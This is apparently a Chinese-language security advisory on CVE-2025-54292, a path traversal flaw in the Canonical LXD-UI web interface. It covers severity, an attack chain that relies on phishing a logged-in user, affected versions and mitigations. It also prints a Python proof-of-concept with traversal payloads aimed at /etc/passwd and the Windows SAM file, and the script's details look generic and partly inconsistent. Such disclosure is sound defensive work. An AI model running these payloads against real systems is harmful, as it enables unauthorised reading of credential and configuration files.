CVE-2025-54292：Canonical LXD-UI 路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-54292

漏洞类型

路径遍历（Path Traversal）

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Canonical LXD LXD-UI

漏洞概述

CVE-2025-54292 是 Canonical LXD 容器管理平台的 Web 管理界面 LXD-UI 中存在的一个路径遍历（Path Traversal）漏洞。该漏洞影响 LXD-UI 6.5 之前的所有版本以及 5.21.4 之前的 5.x 版本，影响所有支持平台。LXD-UI 是 Canonical 提供的用于管理 LXD 容器实例的图形化 Web 界面，允许管理员通过浏览器执行容器创建、配置、网络管理等操作。

该漏洞源于 LXD-UI 在处理 URL 路径中嵌入的资源名称时，未能充分验证和过滤用户输入中的特殊字符（如 ../ 等路径遍历序列）。远程攻击者可以利用精心构造的 URL 路径，绕过预期的资源访问限制，访问或修改本不应被授权访问的资源。由于 LXD-UI 通常用于管理生产环境中的容器基础设施，该漏洞可能导致敏感配置信息泄露、容器配置被恶意修改，甚至在特定条件下影响底层宿主机系统安全。

根据 CVSS 3.1 评分体系，该漏洞评分为 4.6 分，属于中危级别。攻击者需要具备低权限认证凭据（PR:L），并需要用户交互（UI:R），这意味着攻击者需要诱导已认证的用户点击恶意链接或访问恶意页面才能触发漏洞利用。漏洞的影响范围包括低级别的机密性影响（C:L）和完整性影响（I:L），但不会直接导致系统不可用（A:N）。

技术细节

路径遍历漏洞（Path Traversal，又称目录遍历）的根本原因在于应用程序未能正确处理用户输入中包含的特殊路径字符（如 ../、..\ 等）。在 LXD-UI 的实现中，URL 路径中嵌入的资源名称直接被用于文件系统操作或内部路由解析，而没有进行充分的输入验证和规范化处理。

具体利用方式如下：

1. 攻击者首先需要获取 LXD-UI 的有效认证凭据（低权限账户即可），这可以通过钓鱼攻击、凭据泄露或其他社会工程学手段获得。

2. 攻击者构造包含路径遍历序列的恶意 URL。例如，将正常的资源请求路径如 /ui/instance/my-container 修改为 /ui/instance/../../../etc/passwd 或 /ui/instance/..%2F..%2F..%2Fetc%2Fpasswd（URL 编码形式）。

3. 当已认证的用户（受害者）在登录状态下访问该恶意链接时，LXD-UI 服务器会解析 URL 中的资源名称，由于缺乏路径规范化处理，服务器会将遍历序列解析为上层目录路径，从而访问到预期范围之外的资源。

4. 根据 LXD-UI 的具体实现，攻击者可能能够读取敏感的系统配置文件、访问其他用户的容器配置数据，或者修改不属于自己的容器实例配置。

5. 该漏洞需要用户交互（UI:R），因此攻击者通常需要通过钓鱼邮件、即时消息等方式诱导受害者点击恶意链接。

攻击链分析

STEP 1

步骤1：获取初始访问

攻击者通过钓鱼攻击、凭据填充或其他手段获取 LXD-UI 的低权限认证凭据。攻击者需要至少一个有效的用户账户才能利用此漏洞。

STEP 2

步骤2：构造恶意 URL

攻击者精心构造包含路径遍历序列（如 ../ 或 URL 编码形式 %2F）的恶意 URL，将正常的资源访问路径修改为指向非授权资源的路径。

STEP 3

步骤3：诱导用户交互

由于漏洞利用需要用户交互（UI:R），攻击者通过钓鱼邮件、即时消息或恶意网页等方式，诱导已登录的受害用户点击恶意链接。

STEP 4

步骤4：触发路径遍历

受害用户在已认证的浏览器会话中点击恶意链接，浏览器向 LXD-UI 服务器发送包含路径遍历序列的请求。

STEP 5

步骤5：绕过访问控制

LXD-UI 服务器未能正确验证和规范化 URL 路径中的资源名称，导致路径遍历序列被解析，攻击者成功访问或修改预期范围之外的资源。

STEP 6

步骤6：数据泄露或篡改

攻击者读取敏感配置文件、访问其他用户的容器配置数据，或修改不属于自己的容器实例配置，实现数据泄露或完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54292 - Canonical LXD-UI Path Traversal PoC
# Affected: LXD-UI versions before 6.5 and 5.21.4

import requests
from urllib.parse import quote

TARGET_URL = "https://lxd-ui-target:8443"
AUTH_TOKEN = "your_auth_token_here"  # Low-privilege authenticated session token

def exploit_path_traversal(base_url, token, traversal_path):
    """
    Exploit path traversal in LXD-UI by injecting traversal sequences
    into resource names embedded in URL paths.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    # Construct malicious URL with path traversal payload
    # Example: /api/v1/instances/..%2F..%2F..%2Fetc%2Fpasswd
    encoded_payload = quote(traversal_path, safe='')
    malicious_url = f"{base_url}/ui/instance/{encoded_payload}"
    
    print(f"[*] Sending path traversal request to: {malicious_url}")
    
    response = requests.get(malicious_url, headers=headers, verify=False)
    
    if response.status_code == 200:
        print(f"[+] Success! Retrieved content:")
        print(response.text)
        return response.text
    else:
        print(f"[-] Failed with status code: {response.status_code}")
        return None

# Example payloads
payloads = [
    "../../../etc/passwd",
    "..%2F..%2F..%2Fetc%2Fpasswd",
    "....//....//....//etc/passwd",
    "..%252f..%252f..%252fetc%252fpasswd",  # Double encoding
    "..\\..\\..\\windows\\system32\\config\\sam"  # Windows style
]

if __name__ == "__main__":
    for payload in payloads:
        print(f"\n[*] Trying payload: {payload}")
        result = exploit_path_traversal(TARGET_URL, AUTH_TOKEN, payload)
        if result:
            break

影响范围

Canonical LXD-UI < 5.21.4

Canonical LXD-UI < 6.5

所有受影响平台的 LXD-UI 上述版本

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在反向代理（如 Nginx、HAProxy）层面配置 URL 过滤规则，拒绝包含路径遍历序列（../、..\、%2F%2E%2E 等）的请求；2）实施网络隔离，限制 LXD-UI 管理界面仅允许可信 IP 地址访问；3）加强用户安全意识培训，警惕可疑链接；4）监控 LXD-UI 访问日志，及时发现异常访问行为；5）考虑暂时禁用 LXD-UI Web 界面，改用 LXD 命令行工具进行管理。